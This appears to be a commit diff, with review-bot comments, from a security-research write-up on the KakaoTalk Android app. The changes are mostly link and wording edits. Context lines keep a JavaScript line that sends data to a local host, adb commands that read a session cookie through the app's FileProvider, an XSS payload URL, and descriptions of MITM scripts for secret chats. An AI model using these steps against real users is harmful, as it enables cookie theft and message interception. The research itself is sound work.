mirror of
https://github.com/stulle123/kakaotalk_analysis.git
synced 2024-11-26 15:32:15 +00:00
Finalize write-up
This commit is contained in:
parent
3c9880d142
commit
99ff6f8727
19
README.md
19
README.md
|
@ -2,18 +2,19 @@
|
|||
|
||||
## Setup
|
||||
|
||||
[My setup used to analyze the KakaoTalk Android app](SETUP.md).
|
||||
[My setup used to analyze the KakaoTalk Android app](./doc/SETUP.md).
|
||||
|
||||
## Recon
|
||||
|
||||
- [General recon notes](RECON.md).
|
||||
- [WebView recon](./recon/webview/WEBVIEW.md).
|
||||
|
||||
## Scripts
|
||||
|
||||
Frida and mitmproxy scripts are [here](./scripts/).
|
||||
- [General recon notes](./doc/RECON.md).
|
||||
- [WebView recon](./doc/WEBVIEW.md).
|
||||
|
||||
## Findings
|
||||
|
||||
- [Steal another user's chat messages](ACCOUNT_TAKEOVER.md)
|
||||
- [Secret Chat findings](SECRET_CHAT.md)
|
||||
- [Steal another user's chat messages](./doc/ACCOUNT_TAKEOVER.md)
|
||||
- [Secret Chat findings](./doc/SECRET_CHAT.md)
|
||||
|
||||
## Scripts
|
||||
|
||||
- Frida and mitmproxy scripts are in [here](./scripts/).
|
||||
- [How to run the mitmproxy scripts](./scripts/mitmproxy/README.md)
|
|
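Review bot: the new line `- Frida and mitmproxy scripts are in [here](./scripts/).` reads awkwardly ("are in here" with the link text on "here"); suggest `- Frida and mitmproxy scripts are [here](./scripts/).` as the removed line had it, or `- Frida and mitmproxy scripts live in [scripts/](./scripts/).`. The link relocations to `./doc/...` in this hunk match the path changes made in the other files of this commit.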
@ -18,7 +18,7 @@
|
|||
|
||||
> Disclaimer: Initial recon was performed on an older version of KakaoTalk (`10.1.7`).
|
||||
|
||||
> There are a lot of **TO-DO's** in this document where one can try to dig deeper.
|
||||
> There are a lot of **TODO's** in this document where one can try to dig deeper.
|
||||
|
||||
## General App Infos
|
||||
|
||||
|
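Review bot: `**TODO's**` keeps an apostrophe plural, while the heading renamed in WEBVIEW.md in this same commit uses `## TODOs / Digging`; suggest `**TODOs**` here so the spelling is consistent across the write-up.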
@ -86,7 +86,7 @@ zzng.xml
|
|||
|
||||
Some values (e.g., OAuth tokens) in the Shared Preferences are encrypted with a static key which is derived from a hard-coded passphrase (can be found in class `SimpleCipher`).
|
||||
|
||||
**TO-DO**: Check Shared Prefs for sensitive information.
|
||||
**TODO**: Check Shared Prefs for sensitive information.
|
||||
|
||||
Trace Shared Prefs usage with this [Frida script](https://github.com/m0bilesecurity/Frida-Mobile-Scripts/blob/master/Android/shared_preferences_monitor.js). See [example trace](./recon/frida_trace_shared_prefs.log).
|
||||
|
||||
|
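Review bot: the unchanged context line `See [example trace](./recon/frida_trace_shared_prefs.log).` is a relative link that was not revisited. The README in this commit now links this document as `./doc/RECON.md`, so if the log file stayed under the top-level `recon/` directory the link resolves to `doc/recon/...` and breaks; change it to `../recon/frida_trace_shared_prefs.log` or move the log alongside the document.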
@ -105,13 +105,13 @@ multi_profile_database.db
|
|||
|
||||
One can decrypt the contents of `KakaoTalk.db` and `KakaoTalk2.db` with this [script](https://github.com/jiru/kakaodecrypt).
|
||||
|
||||
**TO-DO**: Find the password for the `crypto_database`. Hook `TrustStore` or `sqlite3_key` after a fresh app install and before login. Implementation in `com.kakao.talk.database.CryptoDatabase`.
|
||||
**TODO**: Find the password for the `crypto_database`. Hook `TrustStore` or `sqlite3_key` after a fresh app install and before login. Implementation in `com.kakao.talk.database.CryptoDatabase`.
|
||||
|
||||
## Rest APIs
|
||||
|
||||
Most endpoints are HTTPS protected. Certs in the `assets/sdk` folder are used for certification pinning (see class `com.kakao.i.http.g.b`).
|
||||
|
||||
Java interfaces with interesting Rest APIs (interface names generated by `jadx`): **TO-DO**: Add GET and POST requests. Use `sqlmap -r` to *fuzz* the Rest APIs.
|
||||
Java interfaces with interesting Rest APIs (interface names generated by `jadx`): **TODO**: Add GET and POST requests. Use `sqlmap -r` to *fuzz* the Rest APIs.
|
||||
|
||||
Interesting classes:
|
||||
```
|
||||
|
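Review bot: two wording issues on lines this hunk touches or carries as context: `certification pinning` should be `certificate pinning`, and `Java interfaces with interesting Rest APIs (interface names generated by `jadx`): **TODO**: Add GET and POST requests.` splices the TODO into the sentence that introduces the `Interesting classes:` list; put the `**TODO**` on its own line as the other sections in this file do.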
@ -138,19 +138,19 @@ Many many (exported) `BROWSABLE` Activities.
|
|||
|
||||
## Services
|
||||
|
||||
**TO-DO**
|
||||
**TODO**
|
||||
|
||||
## Content Providers
|
||||
|
||||
**TO-DO**
|
||||
**TODO**
|
||||
|
||||
## Broadcast Receivers
|
||||
|
||||
**TO-DO**
|
||||
**TODO**
|
||||
|
||||
## WebViews
|
||||
|
||||
See [here](./recon/webview/WEBVIEW.md).
|
||||
See [here](./WEBVIEW.md).
|
||||
|
||||
## Firebase
|
||||
|
||||
|
@ -193,7 +193,7 @@ $ curl "https://firebaseremoteconfig.googleapis.com/v1/projects/552367303137/nam
|
|||
|
||||
## Native Libs
|
||||
|
||||
**TO-DO**: Check for memory corruption bugs in native libs (located in `/data/app/com.kakao.talk-wRI5HzbljAi9o-6SZLN55g==/lib/arm64`):
|
||||
**TODO**: Check for memory corruption bugs in native libs (located in `/data/app/com.kakao.talk-wRI5HzbljAi9o-6SZLN55g==/lib/arm64`):
|
||||
|
||||
```bash
|
||||
libACExternalCore.so libc++_shared.so libopencv_java4.so
|
|
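Review bot: the path `/data/app/com.kakao.talk-wRI5HzbljAi9o-6SZLN55g==/lib/arm64` on the changed line contains a per-install random suffix that changes on every reinstall, so readers will not find this directory verbatim; suggest noting that the suffix varies and that `adb shell pm path com.kakao.talk` prints the current install location.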
@ -41,12 +41,10 @@ Android implementation specifics:
|
|||
- Receiver's public keys in table `public_key_info` of `KakaoTalk.db` database
|
||||
- Shared secret stored in table `secret_key_info` of `KakaoTalk.db` database
|
||||
|
||||
TO-DOS:
|
||||
TODOS:
|
||||
|
||||
- Reinstall the app and check whether a warning shows up
|
||||
- Test CFB bit flipping
|
||||
- How are the msgId and chatId generated? -> nonce for CTR mode!
|
||||
|
||||
Demo:
|
||||
|
||||
![MITM](https://github.com/stulle123/kakaotalk_analysis/tree/main/scripts/mitmproxy/secret_chat_demo.gif?raw=true)
|
||||
![MITM](https://github.com/stulle123/kakaotalk_analysis/tree/main/doc/secret_chat_demo.gif?raw=true)
|
|
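Review bot: `TODOS:` is inconsistent with the `TODO`/`TODOs` spelling used elsewhere in this commit; suggest `TODOs:`. Also verify that the moved image link `https://github.com/stulle123/kakaotalk_analysis/tree/main/doc/secret_chat_demo.gif?raw=true` actually renders: `?raw=true` is normally used on a `blob/` URL rather than `tree/`, and the gif rename itself shows up in this commit only as the `Before Width: | Height: | Size: 1.3 MiB` line.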
@ -53,7 +53,7 @@ Install required tools:
|
|||
|
||||
- Get latest [jadx](https://nightly.link/skylot/jadx/workflows/build-artifacts/master)
|
||||
- Get [Burp Suite](https://portswigger.net/burp/communitydownload)
|
||||
- Get [KakaoTalk for Windows/MacOS](https://www.kakaocorp.com/page/service/service/KakaoTalk?lang=en)
|
||||
- Get [KakaoTalk for MacOS](https://www.kakaocorp.com/page/service/service/KakaoTalk?lang=en)
|
||||
- `$ brew install apktool nuclei sqlite db-browser-for-sqlite`
|
||||
- `$ pip3 install --upgrade frida-tools mitmproxy`
|
||||
|
|
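Review bot: narrowing the download line to `KakaoTalk for MacOS` is consistent with the `$ brew install ...` line below it, which only applies on a Mac; Apple's spelling is `macOS`, so use that on the changed line.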
@ -1,7 +1,7 @@
|
|||
# WebView Recon
|
||||
|
||||
- [Low Severity Findings](#low-severity-findings)
|
||||
- [To-Dos / Digging](#to-dos--digging)
|
||||
- [TODOs / Digging](#TODOs--digging)
|
||||
- [Tokens / Cookies](#tokens--cookies)
|
||||
- [JavaScript Interfaces](#javascriptinterface)
|
||||
- [Redirect Endpoints](#redirect-endpoints)
|
||||
|
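Review bot: the anchor in `- [TODOs / Digging](#TODOs--digging)` looks like the `To-Do` to `TODO` replacement hit the URL fragment as well. Rendered heading anchors are lowercase, and every other entry in this list uses a lowercase fragment, so the link should be `(#todos--digging)` to match the renamed `## TODOs / Digging` heading.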
@ -20,7 +20,7 @@
|
|||
|
||||
> Disclaimer: Initial recon was performed on an older version of KakaoTalk (`10.1.7`).
|
||||
|
||||
> There are a lot of **TO-DO's** in this document where one can try to dig deeper.
|
||||
> There are a lot of **TODO's** in this document where one can try to dig deeper.
|
||||
|
||||
## Low Severity Findings
|
||||
|
||||
|
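Review bot: this disclaimer block (the `> Disclaimer: Initial recon was performed on an older version of KakaoTalk (`10.1.7`).` line plus the TODO line) is an exact duplicate of the one edited in RECON.md in this commit. If both copies are kept, the same apostrophe nit applies (`**TODOs**` rather than `**TODO's**`); keeping it in one file and linking from the other would stop the two from drifting apart.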
@ -113,14 +113,14 @@ img.src = 'http://10.0.2.2:8888?data=' + encodeURIComponent(data);
|
|||
- Reading a cookie: `adb shell content read --uri "content://com.kakao.talk.FileProvider/external_files/emulated/0/Android/data/com.kakao.talk/KakaoTalk/cookie/.57f323da7592b0b5de1360de3da701b0d1aa6627"`
|
||||
- Using the `android-app:` scheme: `adb shell am start "android-app://#Intent\;component=com.kakao.talk/.activity.setting.MyProfileSettingsActivity\;S.EXTRA_URL=content://com.kakao.talk.FileProvider/external_files/emulated/0/Android/data/com.kakao.talk/KakaoTalk/cookie/.57f323da7592b0b5de1360de3da701b0d1aa6627\;end"`
|
||||
- There are a couple of JavaScript interfaces that access the user's location (see [below](#javascriptinterface))
|
||||
- Auto-download to `/sdcard/Download` via Chrome (`app://kakaotalk/openURL?url=`)
|
||||
- AuTODOwnload to `/sdcard/Download` via Chrome (`app://kakaotalk/openURL?url=`)
|
||||
- I can access other `BROWSABLE` Activities or Apps via the `android-app:` scheme, e.g.:
|
||||
- `location.href = "android-app://com.google.android.googlequicksearchbox/https/www.google.com"`
|
||||
- `setWebContentsDebuggingEnabled` is enabled for most WebViews
|
||||
- XSS in `com.kakao.talk.activity.cscenter.CsCenterActivity` (search field)
|
||||
- https://cs.kakao.com/search?query=%3Cscript%3Ealert%281%29%3C%2Fscript%3E (you need to click into the search field to trigger the alert)
|
||||
|
||||
## To-Dos / Digging
|
||||
## TODOs / Digging
|
||||
|
||||
Things to try out / dig deeper.
|
||||
|
||||
|
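Review bot: the changed line `- AuTODOwnload to `/sdcard/Download` via Chrome (`app://kakaotalk/openURL?url=`)` is a find-and-replace accident: the `To-Do` to `TODO` substitution matched the `to-do` inside `Auto-download`. Restore `Auto-download` (the removed line was correct); the same breakage appears in the next hunk of this file.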
@ -241,17 +241,17 @@ Maybe someone finds a XSS here:
|
|||
- `XMLHttpRequest` still won't work -> because it's not a `file://` URL?
|
||||
- Need to be able to create/download files in/to `Download` folder
|
||||
- Cannot steal files that cannot be rendered in a Webview (e.g., `LocalUser_DataStore.pref.preferences_pb` in `files` folder). Text files work fine: `content://com.kakao.talk.FileProvider/onepass/PersistedInstallation.W0RFRkFVTFRd+MTo1NTIzNjczMDMxMzc6YW5kcm9pZDpiNjUwZmVmOGI2MDY1MzVm.json`.
|
||||
- `CommerceShopperWebViewActivity` doesn't auto-download but also doesn't render binary files
|
||||
- `CommerceShopperWebViewActivity` doesn't auTODOwnload but also doesn't render binary files
|
||||
|
||||
### DownloadListener.onDownloadStart
|
||||
|
||||
- Check `p21.e` / `DownloaderTask` class (`com.kakao.talk.widget.webview.WebViewHelper` -> `processDownload()` -> `C42792b.m9697b()` -> `DownloaderTask.m16277b()`)
|
||||
- **TO-DO**: Try path traversal
|
||||
- **TODO**: Try path traversal
|
||||
- Bypass `DownloaderTask` checks
|
||||
- Downloads files to `/sdcard/Download/` directory
|
||||
- Not able to overwrite files
|
||||
- Play with `data:` URIs (`data:[<mediatype>][;base64],<data>`)
|
||||
- **TO-DO:** I *might* be able to force WebViews to auto-download files by pointing them to an attacker-controlled website. Required headers:
|
||||
- **TODO:** I *might* be able to force WebViews to auTODOwnload files by pointing them to an attacker-controlled website. Required headers:
|
||||
- `Content-Type: application/octet-stream`
|
||||
- `content-disposition: attachment; filename=foo.html`
|
||||
- Investigate `com.kakao.talk.widget.webview.WebViewHelper` class:
|
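Review bot: `auTODOwnload` on the two changed lines (`- `CommerceShopperWebViewActivity` doesn't auTODOwnload ...` and `... force WebViews to auTODOwnload files ...`) is the same find-and-replace accident as in the previous hunk: the `to-do` inside `auto-download` was matched. Restore `auto-download` on both lines; the only intended change in this hunk is `**TO-DO**` to `**TODO**`.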
Before Width: | Height: | Size: 1.3 MiB After Width: | Height: | Size: 1.3 MiB |
|
@ -1,21 +1,31 @@
|
|||
# MITM Kakaotalk LOCO Packets
|
||||
# mitmproxy Scripts
|
||||
|
||||
This is a simple script to man-in-the-middle LOCO packets with mitmproxy.
|
||||
There are four `mitmproxy` scripts in this directory to play with LOCO traffic:
|
||||
|
||||
Setup on your MITM host:
|
||||
- `flip_ciphertext_bits.py` -> a POC for showing the CFB malleability of encrypted LOCO packets
|
||||
- `replace_loco_message.py` -> Replace a LOCO message with another one to show missing integrity protection
|
||||
- `mitm_single_tls_host.py` -> MITM a single TLS host only. Passthrough all other TLS traffic.
|
||||
- `mitm_secret_chat.py` -> MITM end-to-end encrypted *SECRET CHAT* messages
|
||||
|
||||
To run the scripts, do the following:
|
||||
|
||||
1. Start mitmproxy script on your MITM host and copy the WireGuard config:
|
||||
|
||||
```bash
|
||||
$ python3 -m venv venv
|
||||
$ source venv/bin/activate
|
||||
(venv) $ python3 -m pip install mitmproxy bson cryptography
|
||||
(venv) $ mitmdump --mode wireguard --rawtcp -s loco_mitm.py
|
||||
(venv) $ mitmdump --mode wireguard --rawtcp -s replace_loco_message.py
|
||||
```
|
||||
|
||||
Android emulator setup:
|
||||
2. Android device/emulator setup:
|
||||
|
||||
- Install the Kakaotalk app if not done already
|
||||
- Install the WireGuard app
|
||||
- Change the IP address in mitmproxy's generated WireGuard config to `10.0.2.2`. Example:
|
||||
- Import mitmproxy's generated WireGuard config into the WireGuard app
|
||||
|
||||
If you run the Android Emulator on your MITM host, change the IP address to `10.0.2.2`. Example:
|
||||
|
||||
```
|
||||
[Interface]
|
||||
PrivateKey = MCCAFVMZQk+k+sbdXx0B4LG+Mij/UO7qyWa7IRqv/nA=
|
||||
|
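Review bot: the device setup steps are now in the wrong order: `- Import mitmproxy's generated WireGuard config into the WireGuard app` comes before `If you run the Android Emulator on your MITM host, change the IP address to `10.0.2.2`.`, so a reader following the list imports the unmodified config and then has to edit and re-import it. Either move the IP note above the import bullet or phrase the bullet as "edit the config (see below), then import it". Also, the example config carries a literal `PrivateKey = ...` value; a placeholder such as `PrivateKey = <from mitmproxy output>` avoids shipping a key in the README.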
@ -27,9 +37,8 @@ PublicKey = K+t/qiGO8tlA9L7wjAOb8wqjnu/NuthHgLs2gOCIDgY=
|
|||
AllowedIPs = 0.0.0.0/0
|
||||
Endpoint = 10.0.2.2:51820
|
||||
```
|
||||
- Import the config into the WireGuard app
|
||||
|
||||
Back on your MITM host start Frida (see [setup instructions](../../SETUP.md#setup-frida-to-disable-certificate-pinning)):
|
||||
3. Start Frida on MITM host (see [setup instructions](../../doc/SETUP.md#setup-frida-to-disable-certificate-pinning))
|
||||
|
||||
```bash
|
||||
# Start frida-server
|
||||
|
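Review bot: dropping `- Import the config into the WireGuard app` here is fine since step 2 now covers it, but the new line `3. Start Frida on MITM host (see [setup instructions](...))` lost the trailing colon that introduces the following `bash` block, unlike step 1; add the colon. The `../../doc/SETUP.md#setup-frida-to-disable-certificate-pinning` path is consistent with the README now linking `./doc/SETUP.md`.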
@ -39,7 +48,7 @@ $ adb root && adb shell /data/local/tmp/frida-server
|
|||
$ frida -U -l loco-tracer.js -f com.kakao.talk
|
||||
```
|
||||
|
||||
To run the unit tests:
|
||||
Optional: To run the unit tests for `mitm_secret_chat.py`:
|
||||
|
||||
- Install `pytest` and `pytest-datadir` via pip
|
||||
- Run the tests: `$ pytest tests/test_loco_parser.py`
|
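Review bot: the new heading `Optional: To run the unit tests for `mitm_secret_chat.py`:` names one script, but the command below runs `tests/test_loco_parser.py`, which by its name tests a LOCO parser rather than `mitm_secret_chat.py`; either name the module the tests actually cover or, if the parser is shared by all four scripts listed at the top of this README, say so.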